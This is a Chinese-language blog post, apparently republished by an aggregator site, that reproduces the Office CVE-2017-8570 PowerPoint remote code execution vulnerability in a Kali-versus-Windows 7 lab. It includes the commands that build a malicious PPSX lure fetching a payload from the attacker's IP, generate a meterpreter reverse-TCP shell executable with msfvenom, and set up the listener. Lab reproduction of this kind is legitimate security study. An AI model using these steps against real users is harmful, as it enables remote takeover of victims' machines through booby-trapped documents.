Office CVE-2017-8570 远程代码执行漏洞复现
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Office CVE-2017-8570 远程代码执行漏洞复现相关的知识,希望对你有一定的参考价值。
最近在学习kali的相关使用,朋友说不如就复现cve-2017-8570吧,我欣然答应。
0x00介绍
CVE-2017-8570是一个逻辑漏洞,成因是Microsoft PowerPoint执行时会初始化“script”Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而执行sct脚本(Windows Script Component)文件。攻击者可以诱导用户运行恶意PPT文件,便可获取和当前登陆用户相同的执行权限,该漏洞利用方法简单影响范围广。
0X01影响版本
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
0x02复现
攻击者
操作系统:kali2018
IP:192.168.40.22
受害者
操作系统:win7 x64(office 2007)
IP:192.168.40.159
- 我们下载好利用的exp之后,解压打开里面的README.md。进入文件目录输入:cat README.md里面详细讲了操作步骤,讲真readme真的好用。如图:注意图中红框中的ip地址,均为攻击者的ip地址。
- 按照上图步骤进行第一步:生成恶意的PPSX文件
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.40.22/logo.doc - 第二步:生成反弹shell的exe文件,注意这里要是是64位系统,需要在windows后面加x64
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.40.22 LPORT=4444 -f exe > /var/www/html/shell.exe - 第三步:开启msf的监听
- 第四步:生成监听来自ppsx执行反弹shell,自动开启80端口,注意这里的shell文件路径要和之前生成的文件路径一样。不过在进行这一步之前,我先将生成的Incoice.ppsx文件移到/var/www/html下,然后开启Apache服务,本机访问192.168.40.22/Incoice.ppsx,将恶意文件下载下来,随后关闭Apache服务。
此时这里已经可以看到received request for payload from 192.168.40.159,因为我是运行恶意文件之后截的图。 - 受害者打开ppsx文件,即可看到成功反弹shell。期间失败过,shell反弹不了,第二天再试的时候就好了,具体原因就归类于自己粗心吧~~~
到此为止就已经成功复现该漏洞了。细心+不放弃=成功!
以上是关于Office CVE-2017-8570 远程代码执行漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章
隐藏17年的Office远程代码执行漏洞(CVE-2017-11882)